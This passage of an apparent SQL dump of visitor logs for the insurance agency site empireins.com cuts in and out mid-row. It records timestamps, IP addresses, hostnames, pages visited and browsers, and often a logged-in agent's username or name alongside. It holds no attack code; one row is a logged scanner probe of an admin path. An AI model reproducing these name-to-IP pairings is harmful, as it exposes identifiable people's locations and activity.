(KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(9681,'0b_05f260bb4ce9f26d58e95a20a5840453','1459181012','67.85.210.17','ool-4355d211.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(9683,'0b_d27316e528cf9ee15124b3c1933a2514','1459181355','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(9684,'0b_d27316e528cf9ee15124b3c1933a2514','1459181356','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(9686,'0b_05f260bb4ce9f26d58e95a20a5840453','1459181709','67.85.210.17','ool-4355d211.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(9689,'0b_c2daaed3840f0e4747555a8b2dc74dc4','1459181792','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','ykaufman','','0','0',0),(9690,'0b_05f260bb4ce9f26d58e95a20a5840453','1459181814','67.85.210.17','ool-4355d211.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(9693,'0b_05f260bb4ce9f26d58e95a20a5840453','1459181857','67.85.210.17','ool-4355d211.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(9695,'0b_05f260bb4ce9f26d58e95a20a5840453','1459182038','67.85.210.17','ool-4355d211.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(9698,'0b_d27316e528cf9ee15124b3c1933a2514','1459182109','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(9701,'0b_ea638707fd49b4ea911bf11d67012181','1459182491','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9702,'0b_83f149ed389f98d844a4738227072aff','1459182780','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1600 x 900','','','','Chaim Babad','','0','0',0),(9704,'0b_83f149ed389f98d844a4738227072aff','1459182781','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','Chaim Babad','','0','0',0),(9707,'0b_83f149ed389f98d844a4738227072aff','1459182785','104.246.54.244','ool-68f636f4.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','Chaim Babad','','0','51',0),(9710,'0b_ec504e2b25380ddefc47a7ab9dc025da','1459182984','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','1600 x 900','','','','','','0','0',0),(9713,'0b_ec504e2b25380ddefc47a7ab9dc025da','1459182987','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','','','0','0',0),(9714,'0b_ec504e2b25380ddefc47a7ab9dc025da','1459182994','69.164.140.246','69.164.140.246.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','','','0','0',0),(9717,'0b_ec504e2b25380ddefc47a7ab9dc025da','1459183061','69.164.140.246','69.164.140.246.xchangetele.com','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(9720,'0b_ec504e2b25380ddefc47a7ab9dc025da','1459183147','69.164.140.246','69.164.140.246.xchangetele.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/case-status/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(9722,'0b_ec504e2b25380ddefc47a7ab9dc025da','1459183156','69.164.140.246','69.164.140.246.xchangetele.com','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(9725,'0b_d27316e528cf9ee15124b3c1933a2514','1459183398','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(9728,'0b_d27316e528cf9ee15124b3c1933a2514','1459183399','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(9729,'0b_d27316e528cf9ee15124b3c1933a2514','1459183401','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(9732,'0b_d27316e528cf9ee15124b3c1933a2514','1459183449','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(9734,'0b_d27316e528cf9ee15124b3c1933a2514','1459183457','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(9737,'0b_7c96ef75ae1f34d8909892e047d659a0','1459183951','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(9738,'0b_c486ba4ce5bfa98cfbb888a9b5de1557','1459184781','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(9740,'0b_c486ba4ce5bfa98cfbb888a9b5de1557','1459184782','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(9741,'0b_c486ba4ce5bfa98cfbb888a9b5de1557','1459184786','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(9744,'0b_c486ba4ce5bfa98cfbb888a9b5de1557','1459184812','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(9746,'0b_c486ba4ce5bfa98cfbb888a9b5de1557','1459185636','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(9749,'0b_c6b7b18365c4645fe24958c10d39c44c','1459186002','66.249.80.46,209.64.152.62','209.64.152.62','/quotes.htm','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(9752,'0b_c4fb75b158a12702a71782bb859834c1','1459187285','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9755,'0b_d0b44c31e98751410338f78e6a0dfced','1459187594','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(9758,'0b_c0460a0b3ad7e3a58e2b2d6e3dcba0d9','1459189185','208.42.251.123,45.33.15.94','li969-94.members.linode.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.99 Safari/537.36','','',0,'MacOSX','Chrome 45','','','','','','','','0','0',0),(9759,'0b_f8971b5916973e3d0ec64f46876a56ad','1459191658','208.115.111.66','208-115-111-66-reverse.wowrack.com','/carriers/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9761,'0b_5f452234d9bd06dad76432d4736b1c06','1459192294','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(9762,'0b_70b13b7fcbc07a3ab22dd36bb633adeb','1459198687','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(9765,'0b_924cc48b2f1a262af9502ffc45807990','1459198945','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9768,'0b_5ee88e26e6dbe0faf4e09c951594a4b2','1459199217','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(9770,'0b_5ee88e26e6dbe0faf4e09c951594a4b2','1459199244','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(9773,'0b_5ee88e26e6dbe0faf4e09c951594a4b2','1459199267','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(9774,'0b_924cc48b2f1a262af9502ffc45807990','1459199312','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(9777,'0b_a1fd6b76530066f7e537abab5d91e2c2','1459199381','207.46.13.169','msnbot-207-46-13-169.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(9780,'0b_e9a59b922ed36801c06178878adb4b22','1459199669','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(9783,'0b_e9a59b922ed36801c06178878adb4b22','1459199670','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(9786,'0b_e9a59b922ed36801c06178878adb4b22','1459199681','69.164.140.246','69.164.140.246.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(9789,'0b_b0655899620c61aa79fe92aba4617c4c','1459200710','141.8.143.235','spider-141-8-143-235.yandex.com','/products.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(9792,'0b_11c8829ecf8ff1cc3d4100c0b1ec5641','1459200826','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9795,'0b_6eff7ed9e9383eca1d8177492fa3aff7','1459201527','157.55.39.123','msnbot-157-55-39-123.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9797,'0b_6d762b38c52a5dde217bae592e2ae52d','1459202095','180.76.15.5','baiduspider-180-76-15-5.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(9798,'0b_ec0d46bb074b9ae8384faf08a4664b02','1459203539','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9801,'0b_bd9d6de459e799e20ae8cb34de51200f','1459203539','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9803,'0b_e9ba0ec79a58c691052cdb70523dd34c','1459203625','66.249.83.213,75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(9804,'0b_c7d587604ead40b91b1979a6c41a94a0','1459203732','66.249.73.178','crawl-66-249-73-178.googlebot.com','/contact/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9807,'0b_73d9cfe4c66aa4dcb2ae1655c9ed5053','1459204650','66.249.73.169','crawl-66-249-73-169.googlebot.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9809,'0b_1a68fa002a31b89b7af448f59d99b09b','1459205242','157.56.2.203','msnbot-157-56-2-203.search.msn.com','/robots.txt','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 (BingLocalSearch)','','',0,'Win8','Google Chrome','','','','BingBot','','','','0','0',0),(9810,'0b_1a68fa002a31b89b7af448f59d99b09b','1459205243','157.56.2.203','msnbot-157-56-2-203.search.msn.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 (BingLocalSearch)','','',0,'Win8','Google Chrome','','','','BingBot','','','','0','0',0),(9812,'0b_9fdc4c1c9ddcb30ebd0a0d3629af8b12','1459205839','157.55.39.123','msnbot-157-55-39-123.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(9813,'0b_74091d0f826bff18fba4c2bbd14cdeb9','1459206172','197.231.221.211','exit1.ipredator.se','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','se','','','','','','','2','0',0),(9815,'0b_3c176e3fa5bd1b5ec66fb57dadc89622','1459206173','185.100.86.100','server.saveyourprivacy.is','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','is','','','','','','','2','0',0),(9818,'0b_3d19598d9745f6f82b858961ad0ecd3c','1459206655','193.248.239.4','laubervilliers-656-1-115-4.w193-248.abo.wanadoo.fr','/','Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/11.0.696.50','','',0,'Linux','Chrome 11','fr','','','','','','','0','0',0),(9821,'0b_dfbeefa4a8e1a0bf40ebd89c0c51e6e6','1459206659','193.248.239.4','laubervilliers-656-1-115-4.w193-248.abo.wanadoo.fr','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.11 Safari/535.19','','',0,'MacOSX','Chrome 18','fr','','','','','','','0','0',0),(9822,'0b_c7b42ceeee50392b5a4dfb4743ade545','1459209664','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9825,'0b_70f0139bc91caf4b4289605945df30f0','1459209725','146.120.158.190','190.158.120.146.serverel.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0','','',0,'Win7','Firefox 6','','','','','','','','0','0',0),(9828,'0b_5f65916f8934967f53a06e0ed8d375ab','1459209727','31.148.246.9','31.148.246.9','/about-us/','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9','','',0,'MacOSX','Firefox 3','us','','','','','','','0','0',0),(9831,'0b_277effd7ba3610517c3ad22e638fc330','1459209737','146.120.158.226','226.158.120.146.serverel.net','/contact/','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20091218 Firefox 3.6b5','','',0,'MacOSX','Firefox','us','','','','','','','0','0',0),(9833,'0b_828566595b0fb7a4a2147debb396503d','1459209740','31.148.246.93','31.148.246.93','/contact/','Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.2.9) Gecko/20100913 Firefox/3.6.9','','',0,'FreeBSD','Firefox 3','us','','','','','','','0','0',0),(9836,'0b_8d898dfddb9a99e17784b22da145e510','1459211594','80.255.192.237','80.255.192.237','/myadmin/index.php','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8','','',0,'MacOSX','Firefox 3','us','','','','','','','0','0',0),(9839,'0b_270339269e9f4d28b19be5e5b5a43db6','1459212022','202.46.54.37','ptr.cnsat.com.cn','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Unknown Spider','','','','0','0',0),(9840,'0b_a21af5fedb9b083e09fc0b4963650aec','1459212355','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(9843,'0b_a21af5fedb9b083e09fc0b4963650aec','1459212356','68.180.230.123','b115363.yse.yahoo.net','/companylinks.htm','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(9845,'0b_1598e40e62e8d931903eb5cc477f29b7','1459213555','195.245.112.158','demur133.vds','/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0','http://empireins.com/','',0,'Linux','Firefox 45','','','','','','','','0','0',0),(9848,'0b_7e5a3f0da7c1424bfcb7cd9c9f1050fb','1459214814','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9849,'0b_c76e427321d24c84b004bbad2f7ec49d','1459219143','180.76.15.7','baiduspider-180-76-15-7.crawl.baidu.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(9851,'0b_818b9e6765a23e7a0cf3fa42b77a164c','1459219537','138.201.46.148','static.148.46.201.138.clients.your-server.de','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','de','','','','','','','0','0',0),(9852,'0b_db636f10adb8c3fa9bd910cab41d5e77','1459223161','157.55.39.123','msnbot-157-55-39-123.search.msn.com','/igo','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(9855,'0b_db636f10adb8c3fa9bd910cab41d5e77','1459223182','157.55.39.123','msnbot-157-55-39-123.search.msn.com','/igo/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(9858,'0b_bae6b35554feb713315a65bb283f5001','1459226100','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9860,'0b_8f022788fa4162fc7a3fbbf95a689525','1459226852','107.22.251.189','ec2-107-22-251-189.compute-1.amazonaws.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53','','',0,'iPhone OS','Safari 7 Mobile','','','','','','','','0','0',0),(9861,'0b_2d13f2f4a4bc48d09dfff5b70e1d9bd8','1459229385','66.249.73.178','crawl-66-249-73-178.googlebot.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(9863,'0b_b7db438dac5a4f04afff05810381276a','1459230734','157.55.39.123','msnbot-157-55-39-123.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9864,'0b_08e9ea4dfe00129f307a434b6b6318b5','1459231931','207.46.13.190','msnbot-207-46-13-190.search.msn.com','[404] /documents/Hartfordfacetoface.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9866,'0b_8df310e94148febbc1456ddd641297c0','1459236163','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9869,'0b_2a188d0335c31f8e35208f41b74a438a','1459239215','5.9.98.130','static.130.98.9.5.clients.your-server.de','/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9870,'0b_2a188d0335c31f8e35208f41b74a438a','1459239219','5.9.98.130','static.130.98.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9873,'0b_2a188d0335c31f8e35208f41b74a438a','1459239220','5.9.98.130','static.130.98.9.5.clients.your-server.de','/agent-tools/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9875,'0b_2a188d0335c31f8e35208f41b74a438a','1459239222','5.9.98.130','static.130.98.9.5.clients.your-server.de','/register/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(9878,'0b_2a188d0335c31f8e35208f41b74a438a','1459239225','5.9.98.130','static.130.98.9.5.clients.your-server.de','/about-us/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; 